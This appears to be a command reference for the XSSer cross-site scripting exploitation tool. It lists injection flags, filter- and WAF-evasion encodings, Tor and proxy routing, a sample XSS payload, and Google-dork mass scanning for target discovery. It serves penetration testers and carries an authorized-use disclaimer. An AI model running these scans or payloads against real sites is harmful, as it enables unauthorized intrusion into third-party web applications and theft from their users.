XSSER
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
XSSer (Cross Site Scripter) is an automatic framework for detecting, exploiting, and reporting XSS vulnerabilities in web applications. It provides multiple injection techniques and evasion methods.
BASIC USAGE#
xsser -u <url> # Auto scan for XSS xsser --url <url> # Scan target URL xsser -g # Launch GUI (GTK)
INJECTION MODES#
xsser -u <url> --auto # Automatic injection testing xsser -u <url> --Xsa # XSS via User-Agent header xsser -u <url> --Xsr # XSS via Referer header xsser -u <url> --Xsc # XSS via Cookie header xsser -u <url> --XsD # XSS via DOM injection xsser -u <url> --Coo # Cookie injection xsser -u <url> --Doo # DOM-based testing
TARGET OPTIONS#
xsser -u <url> # Single URL
xsser -i <file> # URLs from file
xsser -d <dork> # Search engine dorking
xsser --De <dork_engine> # Dork search engine (google, bing)
xsser -l <crawl_depth> # Crawl depth
# URL parameter marking:
xsser -u "http://target.com/page?param=XSS"
# XSS marks injection point
PAYLOAD OPTIONS#
xsser -u <url> --payload <script>
# Custom XSS payload
xsser -u <url> --Fr <payload> # Custom final payload
xsser -u <url> --Fp <payload> # Custom fuzzing payload
ENCODING / EVASION#
xsser -u <url> --Cem <method> # Character encoding method xsser -u <url> --Str # Use string.fromCharCode() xsser -u <url> --Une # URL encoding xsser -u <url> --Dwo # Double URL encoding xsser -u <url> --Hex # Hexadecimal encoding xsser -u <url> --Hes # Hex entities (semicolons) xsser -u <url> --Tled # Use alert to confirm xsser -u <url> --Sfi # Substitute & filter xsser -u <url> --Ank # Anchor tag injection xsser -u <url> --Dcp # Data Control Protocol
TECHNIQUE OPTIONS#
xsser -u <url> --Coo # Cookie injection xsser -u <url> --Xsa # User-Agent injection xsser -u <url> --Xsr # Referer injection xsser -u <url> --Xsc # Cookie injection xsser -u <url> --XsD # DOM injection
PROXY & NETWORK#
xsser -u <url> --proxy <proxy> # Use HTTP proxy xsser -u <url> --tor # Use Tor network xsser -u <url> --timeout <secs> # Request timeout xsser -u <url> --threads <n> # Concurrent threads xsser -u <url> --delay <secs> # Delay between requests xsser -u <url> --user-agent <ua> # Custom User-Agent xsser -u <url> --cookie <cookie> # Set cookies xsser -u <url> --auth-cred <u:p> # Basic authentication
OUTPUT OPTIONS#
xsser -u <url> --save # Save results xsser -u <url> --xml <file> # XML output xsser -u <url> -v # Verbose output xsser -u <url> --no-head # Skip HEAD requests xsser -u <url> --reverse-check # Verify XSS with reverse connection
EXAMPLES#
# Automatic XSS scan xsser -u "http://target.com/search?q=XSS" --auto # Scan with WAF evasion (encoding) xsser -u "http://target.com/page?id=XSS" --Hex --Str # DOM-based XSS testing xsser -u "http://target.com/page" --XsD # Header injection testing xsser -u "http://target.com/" --Xsa --Xsr # Custom payload xsser -u "http://target.com/page?q=XSS" --payload "<img src=x onerror=alert(1)>" # Dork-based mass scanning xsser -d "inurl:search.php?q=" --De google # Scan through proxy with encoding xsser -u "http://target.com/?q=XSS" --proxy http://127.0.0.1:8080 --Une --Hex # Save results as XML xsser -u "http://target.com/?q=XSS" --auto --xml results.xml
NOTES#
- Python-based tool - GUI and CLI modes available - Multiple encoding/evasion techniques - Supports reflected, stored, and DOM XSS - Google dorking for target discovery - Can verify XSS via reverse connections - Pair with Burp Suite for manual verification - May produce false positives - verify manually - Actively maintained